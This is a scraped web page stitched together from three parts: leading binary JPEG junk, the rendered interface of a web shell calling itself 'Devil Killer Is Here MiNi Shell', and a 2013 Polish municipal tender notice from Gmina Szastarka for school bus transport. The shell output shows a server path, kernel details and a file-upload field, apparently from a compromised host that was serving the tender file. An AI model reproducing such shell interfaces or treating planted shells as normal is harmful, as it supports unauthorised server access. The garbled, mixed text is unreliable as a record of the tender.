JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130801/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130801/308856-N-2013.html

<p class="kh_header"><b>Szastarka: Dowóz uczniów do placówek oświatowych na terenie Gminy Szastarka w roku szkolnym 2013/2014</b><br>
<b>Numer ogłoszenia: 308856 - 2013; data zamieszczenia: 01.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Szastarka , 23-225 Szastarka, woj. lubelskie, tel. 015 8714104, faks 015 8714130.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaszastarka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do placówek oświatowych na terenie Gminy Szastarka w roku szkolnym 2013/2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz uczniów do placówek oświatowych na  terenie  Gminy Szastarka w roku szkolnym 2013,2014 tj. od dnia 2 września 2013r. do 27 czerwca 2014r, zgodnie z rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego (Dz. U. 2002r. Nr 46, poz. 432 z późn. zm.) poprzez sprzedaż na rzecz Zamawiającego biletów  miesięcznych uprawniających do dowozu. 
1.Wykonawca zobowiązany jest do dostarczenia na własny koszt biletów upoważniających uprawnionych uczniów i dzieci do korzystania z usługi dowozu na danej części zamówienia. Bilet miesięczny jest biletem imiennym i posługiwać może się nim osoba, której imię  i nazwisko widnieje na bilecie. W razie kontroli, jest wymagane przedstawienie dokumentu potwierdzającego tożsamość posiadacza biletu. Bilet miesięczny jest ważny na jeden miesiąc od pierwszego do ostatniego dnia danego miesiąca. Bilet dostarcza Wykonawca na swój koszt. 
2.Wykonawca zobowiązany będzie do dowiezienia uczniów do szkół oraz ich odwiezienia zgodnie z wykazem tras. Przewóz należy zorganizować najkrótszą możliwą drogą. Łączna liczba uczniów do przywiezienia do szkół jak i odwiezienia z powrotem wynosi 188, i jest to przewidywana liczba uczniów korzystających z dowozu w roku szkolnym 2013,2014, podana według stanu w miesiącu czerwcu 2013r. na podstawie złożonych informacji przez dyrektorów szkół, na łącznym odcinku  250 km. 
Wykonawca winien dowieźć uczniów do szkół na zajęcia co najmniej 10 minut przed ich rozpoczęciem. Faktyczne godziny odjazdów autobusów Wykonawca ustali z dyrektorami poszczególnych szkół.. Bilety miesięczne będą przekazywane poszczególnym dyrektorom szkół przez Wykonawcę, najpóźniej do dnia 20 miesiąca poprzedzającego miesiąc wykonania zamówienia. 
3.W myśl art. 14a ust.3 oraz art. 17 ust.3 ustawy z dnia 7 września 1991r. o systemie oświaty (Dz.U. z 2004r. Nr 256, poz. 2572 z późn. zm.) obowiązkiem gminy jest zapewnienie bezpłatnego transportu i opieki w czasie przewozu uczniów do szkół. W związku z powyższym wykonawca zobowiązany jest do zapewnienia bezpieczeństwa uczniów w czasie dowozu do szkół jak i również w drodze powrotnej. Wykonawca podczas świadczenia każdego przewozu zobowiązany jest zapewnić uczniom dodatkowo tj. poza kierowcą, opiekuna. 
4.Zamawiający wyklucza możliwość łączenia funkcji kierowcy i opiekuna. Funkcję opiekuna może sprawować wyłącznie osoba pełnoletnia, która jest zdolna do ponoszenia odpowiedzialności karnej, cywilnej za działanie lub zaniechanie w związku ze sprawowana opieką. Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do zapewnienia bezpieczeństwa w trakcie przewozu uczniów do  szkół, zapewnienia bezpiecznego wsiadania do pojazdu oraz wysiadania z pojazdu uczniów, opieki i zwracania uwagi na właściwe zachowanie się uczniów w czasie przejazdu, a w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów w pojeździe, niedopuszczenie do przewozu uczniów.
5.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują autobusami posiadającymi ważne badania techniczne i ubezpieczenie OC i NNW, w ilości zapewniającej prawidłowe wykonanie przedmiotu zamówienia.
6.Wykonawca zobowiązany jest do zapewnienia kierowców autobusów, którzy posiadają uprawnienia o których mowa w art. 39a.1 ustawy z dnia 6 września 2001r.  o transporcie drogowym (Dz. U. z 2012r. poz. 1265 z późn. zm.) tj. ukończone 21 lat, ważne prawo jazdy kat. D, posiadają ważne badania lekarskie i psychologiczne oraz kurs dokształcania dla kierowców. 
7.W przypadku wystąpienia, podczas wykonywania usługi, awarii uniemożliwiającej dalszą jazdę wyznaczonego autobusu Wykonawca podstawi niezwłocznie, nie później jednak   niż w ciągu 1 godziny od jej wystąpienia, autobus spełniający właściwe wymagania techniczne w ruchu drogowym. W przypadku niemożności zrealizowania przewozu wykonawca pokryje dodatkowo koszty przewozu wynikłe z wykonania usługi przez podmiot zastępczy wybrany przez Zamawiającego. Wykonawca zapewni taką ilość pojazdów, aby była ona dostosowana do ilości przewożonych uczniów.
8.Zamawiający zastrzega, że możliwe są sporadyczne zmiany godzin przywozu i odwozu uczniów wynikające z organizacji pracy szkół. Dyrektorzy szkół poinformują o zmianach pisemnie, telefonicznie bądź faxem nie później niż dwa dni przed wprowadzanymi zmianami.
9.Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.
10.Odbiór uczniów na wyznaczonych trasach będzie się odbywał z istniejących przystanków PKS oraz miejscach ustalonych z dyrektorami szkół.
11.Zamawiający nie dopuszcza składania ofert częściowych. 
12.Opis tras   dowozu uczniów: 
Trasa  I  Dowóz uczniów do Zespołu Szkół w Blinowie  (do Szkoły Podstawowej   i Gimnazjum)  z miejscowości  Blinów  Pierwszy, Blinów Drugi, Cieślanki, Stare Moczydła -razem  ok. 85 uczniów i ok. 80 km dziennie. Pierwszy odwóz  ok. godz. 1240.Drugi odwóz ok. godz. 1420.Przewóz należy zorganizować najkrótszą możliwą drogą.Za początek i koniec trasy uważa się Zespół Szkół w Blinowie. Uczniowie wsiadają i wysiadają tylko w miejscach wyznaczonych.Planowane  rozpoczęcie  zajęć uczniów  o godz. 8 00 a  zakończenie o godz.14 20. 
Trasa  II Dowóz uczniów do Zespołu Szkół w Szastarce  (do Szkoły Podstawowej  i Gimnazjum z miejscowości  Brzozówka, Brzozówka Kolonia, Majdan Obleszcze, Wojciechów.
Razem  ok.25 uczniów i ok.  60 km dziennie. Pierwszy odwóz ok. godz.  1230, drugi odwóz ok. godz. 14 30. Przewóz należy zorganizować najkrótszą możliwą drogą.Za początek i koniec trasy uważa się  Zespół Szkół w Szastarce. Uczniowie wsiadają i wysiadają tylko w miejscach wyznaczonych.
Planowane rozpoczęcie zajęć  w szkole  ok. godz. 800   a zakończenie ok.  godz. 14 30.Trasa  III Dowóz uczniów  do  Publicznej Szkoły Podstawowej w Polichnie  i Publicznego  Gimnazjum w Polichnie   z miejscowości  Rzeczyca Kolonia, Podlesie, Polichna Czwarta, Majdan Obleszcze, Wojciechów,Wierzchowiska,Pasieka.  
Razem ok.83 uczniów i  ok. 110  km dziennie. Pierwszy odwóz  ok. godz. 12,45 . Drugi odwóz ok. godz. 14,30  Przewóz należy zorganizować najkrótszą możliwą drogą.Za początek i koniec trasy uważa się  Szkołę Podstawową i Gimnazjum w Polichnie . Uczniowie wsiadają i wysiadają tylko w miejscach wyznaczonych. Uczniowie rozpoczynają zajęcia ok.  godz. 8, 00  kończą ok. godz. 14 25.                                                                                              Zamawiający zastrzega, że w przypadku wystąpienia okoliczności nieprzewidzianych w organizacji  szkół,  może nastąpić zmiana tras i godzin dowozu .
Uwaga Transport  uczniów  do szkół może być realizowany również  poprzez transport otwarty ( dostępny dla innych pasażerów) Przewozy w oparciu o linie otwarte muszą być prowadzone z zapewnieniem  miejsc siedzących dla dzieci i młodzieży szkolnej.Ponadto Wykonawca zobowiązany jest do wystawienia bezpłatnego biletu do przejazdu  opiekunów dzieci.
Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania  do szkół oraz odwóz uczniów ze szkół na wyznaczony przystanek  w miejscu zamieszkania.
Zamawiający ustala do 30 dni termin płatności licząc od daty złożenia faktury lub rachunku przez Wykonawcę w siedzibie Zamawiającego. Rozliczenia będą odbywać się w cyklach miesięcznych.
Osoby kierujące pojazdami oraz pojazdy przeznaczone do wykonania zamówienia mają spełniać wszelkie wymogi wynikające z przepisów ustawy z dnia 20 czerwca 1997 roku prawo o ruchu drogowym (tekst jedn. Dz. U. 2012 r. poz. 1137).
- Dowożenie winno odbywać się w warunkach zapewniających bezpieczeństwo osób wsiadających, wysiadających i przewożonych, bez wykonywania gwałtownych lub niebezpiecznych manewrów (o ile nie wynikają one z konieczności uniknięcia wypadku), bez przeładowywania pojazdu powyżej ustalonej dla niego normy. Zachowanie kierowcy winno być uprzejme, wyrozumiałe i życzliwe w stosunku do wszystkich dzieci podlegających dowożeniu. 
- Zamawiający zakłada możliwość modyfikowania (wydłużenie - skrócenie tras dowożenia) w trakcie trwania umowy jeżeli jego skutkiem będzie: 1) dobro dzieci, 2) usprawnienie dowożenia, 3) obniżenie kosztów dowożenia. 
- Szczegółowe ustalenia dotyczące czasu dowozu uczniów, organizacji sprawowania opieki nad dowożonymi uczniami dokonane zostaną wspólnie z Urzędem Gminy w Szastarce, Gminnym Zespołem Obsługi Placówek Oświatowych w Szastarce,  dyrektorami szkół i  wykonawcą, którego oferta zostanie wybrana w niniejszym postępowaniu, 
- Zamawiający zastrzega sobie możliwość dokonywania zmian w harmonogramie dowożenia, zmiany ilości (liczby) kursów w ciągu dnia oraz zmiany liczby uczniów, ponadto zamawiający zastrzega sobie możliwość wprowadzania na określone dni innego niż ustalony rozkładu jazdy po wcześniejszym powiadomieniu wykonawcy. 
- Wykonawca ponadto zobowiązuje się do: a) zapewnienia odpowiednich do przedmiotu zamówienia pojazdów samochodowych, a w przypadku awarii także pojazdów rezerwowych umożliwiających wykonanie przedmiotu zamówienia, b) wykonania usług dowożenia i odwożenia uczniów na trasach                         i w terminach realizowanych przez Zamawiającego przy użyciu jego własnych pojazdów, na wypadek ich niesprawności - przy pomocy pojazdów rezerwowych, po cenie ofertowej, z zachowaniem liczby kilometrów potwierdzonej przez Zamawiającego, 
- Wykonawca zobowiązuje się również do zapewnienia opieki na trasach wskazanych w harmonogramie obejmującej dbałość o bezpieczeństwo uczniów dojeżdżających, a w szczególności polegającej m. in. na: a) sprawdzenie stanu autobusu przed wyjazdem na trasę i zgłoszenie kierowcy ewentualnych spostrzeżeń i uwag dotyczących stanu, czystości i wyposażenia pojazdu; b) sprawdzanie na bieżąco, czy jest stosowane oznakowanie pojazdu oraz czy są wykonywanie czynności przy wsiadaniu uczniów określonych w ustawie prawo o ruchu drogowym podczas przewożenia dzieci; c) niedopuszczenie do przewozu uczniów w przypadku stwierdzenia niesprawności autobusu; d) niedopuszczenie do przewozu uczniów w przypadku stwierdzenia niemożliwości zapewnienia bezpieczeństwa dzieci; e) dopilnowanie ładu i porządku podczas wsiadania, przekazywanie uczniom uwag dotyczących porządku na przystanku, miejsca oczekiwania na autobus, sposobu wsiadania i wysiadania z pojazdu, f) dopilnowanie ładu                        i porządku podczas zajmowania miejsc. Udzielanie pomocy najmłodszym uczniom. Dopilnowanie aby wszyscy uczniowie zajęli miejsca siedzące przed wyruszeniem autobusu z przystanku; g) identyfikacja uczniów poprzez sprawdzenie legitymacji szkolnej (w przypadku gdy uczeń nie jest znany osobiście opiekunowi) sprawdzanie stanu liczbowego uczniów przed wejściem do autobusu; h) zwracanie uwagi na prawidłowe zachowanie się uczniów podczas przewozu, reagowanie w przypadkach zaśmiecania pojazdu, niszczenia wyposażenia, posiadania przedmiotów niebezpiecznych, podejmowania przez uczniów działań zagrażających ich bezpieczeństwu oraz używania wulgaryzmów; i) współdziałanie z dyrektorem szkoły oraz nauczycielami pełniącymi dyżury w zakresie zapewnienia bezpieczeństwa dzieci oraz stwierdzenia przypadków niewłaściwego zachowania; j) niezwłoczne zawiadomienie organizatora przewozów lub dyrektora szkoły o występowaniu przypadków niewłaściwego zachowania się uczniów, zachowań które mogą powodować zagrożenia dla bezpieczeństwa przewozu, aktów wandalizmu, przemocy itp 
Podstawiony autobus do dowozu  lub odwozu dzieci powinien być ogrzany do temperatury nie mniejszej niż 10 0 C..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.30.00-3.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości: 1860,00 zł (słownie: tysiąc osiemset sześćdziesiąt złotych). 2. Wadium może być wnoszone w jednej lub kilku następujących formach: 1) w pieniądzu, 2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym, 3) gwarancjach bankowych,                     4) gwarancjach ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późn. zm.). 3. Wniesione wadium musi obejmować okres związania ofertą i nie może zawierać żadnych ograniczeń sprzecznych z ustawą Prawo zamówień publicznych, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i 5 Ustawy. 4. Wadium wniesione w  pieniądzu musi być przelane na rachunek bankowy:  Bank Spółdzielczy Ziemi Kraśnickiej, Oddział w Szastarce   4287 1710 772007 7000 2020 0002.  Potwierdzenie wniesienia wadium należy dołączyć do oferty. Wymagane jest doręczenie kopi dokumentu.W przypadku wpłaty pieniężnej - kopii dowodu wykonanej operacji. 6. W przypadku wniesienia wadium w formie pieniężnej, Wykonawca z zachowaniem właściwej staranności winien dokonać przelewu pieniężnego z odpowiednim wyprzedzeniem, gdyż wniesienie wadium jest skuteczne z chwilą
uznania rachunku bankowego Zamawiającego. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy, nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,  określenie wierzytelności, która ma być zabezpieczona gwarancją, kwotę gwarancji, termin ważności gwarancji, nieodwołalne i bezwarunkowe zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach określonych w ofercie, lub  nie wniósł zabezpieczenia należytego wykonania umowy, lub  zawarcie umowy  stało   się niemożliwe z przyczyn leżących po stronie Wykonawcy lub nie złożył na wezwanie Zamawiającego zgodnie z art. 26 ust 3 ustawy Pzp dokumentów lub oświadczeń,  o których mowa w art.25.ust.1 ustawy Pzp lub pełnomocnictw. Zamawiający zatrzymuje wadium wraz odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w opisie, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana będzie  na podstawie oświadczenia, stanowiącego załącznik nr 2 do opisu oraz przedstawionego aktualnego dokumentu(potwierdzona kserokopia) dopuszczającego wykonawcę do obrotu prawnego  w zakresie objętym zamówieniem (zezwolenie-licencja na  wykonywanie krajowego transportu  drogowego osób) zgodnie  z ustawa z dnia 6 września  2001 r. o  transporcie drogowym (tekst jedn.Dz.U. z 2012 r.poz.1265)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku udziału w postępowaniu Wykonawca złoży oświadczenie zgodnie z art. 22 ustawy Pzp. według załącznika nr 3 do opisu przedmiotu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku udziału w postępowaniu Wykonawca złoży oświadczenie zgodnie z art. 22 ustawy Pzp. według załącznika nr 2 do opisu przedmiotu zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku udziału w postępowaniu Wykonawca złoży oświadczenie zgodnie z art. 22 ustawy Pzp. według załącznika nr 2 do opisu przedmiotu zamówienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku udziału w postępowaniu Wykonawca złoży oświadczenie zgodnie z art. 22 ustawy Pzp. według załącznika nr 2 do opisu przedmiotu zamówienia. Wykonawca odpowiednio na dzień składania wniosków o dopuszczenie do licytacji, w zakresie wskazanym w ogłoszeniu o zamówieniu winien wykazać, że brak jest podstaw  do jego wykluczenia na podstawie art. 24 ust 1 ustawy Pzp.
Niespełnienie powyższych warunków skutkuje obowiązkiem wykluczenia Wykonawcy  z postępowania o udzielenie przedmiotowego zamówienia. W przypadku składania wniosków o dopuszczenie do udziału w licytacji elektronicznej przez wykonawców w oparciu o art. 23 ustawy Pzp warunek dotyczący art. 24 ust 1 musi być spełniony oddzielnie dla każdego z Wykonawców występujących wspólnie.
Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

Ocena spełnienia  warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty  wymienione wyżej, złożone przez Wykonawcę w niniejszym postępowaniu metodą warunku  spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
